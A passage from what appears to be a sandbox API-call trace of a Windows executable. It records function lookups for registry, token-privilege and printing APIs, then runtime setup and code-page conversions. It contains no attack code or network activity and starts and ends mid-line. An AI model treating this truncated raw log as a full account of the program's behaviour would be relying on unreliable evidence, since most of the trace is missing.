lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0297.209] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0297.210] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0297.211] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0297.211] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0297.211] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0297.212] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0297.212] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0297.212] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0297.212] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0297.212] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0297.212] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0297.212] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0297.212] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0297.212] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0297.212] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0297.213] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0297.213] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0297.213] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0297.213] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0297.214] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0297.214] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0297.214] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0297.214] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0297.214] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0297.214] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0297.215] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0297.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5ea531ae, dwHighDateTime=0x1d45ac6)) [0297.215] GetCurrentThreadId () returned 0xc78 [0297.215] GetCurrentProcessId () returned 0xc74 [0297.215] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34467769760) returned 1 [0297.215] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0297.215] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0297.216] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0297.217] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0297.218] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0297.219] GetCurrentThreadId () returned 0xc78 [0297.219] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x59010680, hStdError=0x475810)) [0297.219] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0297.219] GetFileType (hFile=0x38) returned 0x2 [0297.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.219] GetFileType (hFile=0x3c) returned 0x2 [0297.219] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0297.219] GetFileType (hFile=0x40) returned 0x2 [0297.219] GetCommandLineW () returned="vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" [0297.219] GetEnvironmentStringsW () returned 0x591d78* [0297.219] FreeEnvironmentStringsW (penv=0x591d78) returned 1 [0297.219] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0297.220] GetLastError () returned 0x0 [0297.220] SetLastError (dwErrCode=0x0) [0297.220] GetLastError () returned 0x0 [0297.220] SetLastError (dwErrCode=0x0) [0297.220] GetLastError () returned 0x0 [0297.220] SetLastError (dwErrCode=0x0) [0297.220] GetACP () returned 0x4e4 [0297.220] GetLastError () returned 0x0 [0297.221] SetLastError (dwErrCode=0x0) [0297.221] IsValidCodePage (CodePage=0x4e4) returned 1 [0297.221] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0297.221] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0297.221] GetLastError () returned 0x0 [0297.221] SetLastError (dwErrCode=0x0) [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0297.221] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0297.221] GetLastError () returned 0x0 [0297.221] SetLastError (dwErrCode=0x0) [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0297.221] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0297.221] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0297.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x10\x07\x01\x59\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0297.221] GetLastError () returned 0x0 [0297.221] SetLastError (dwErrCode=0x0) [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0297.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0297.221] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0297.221] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0297.221] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\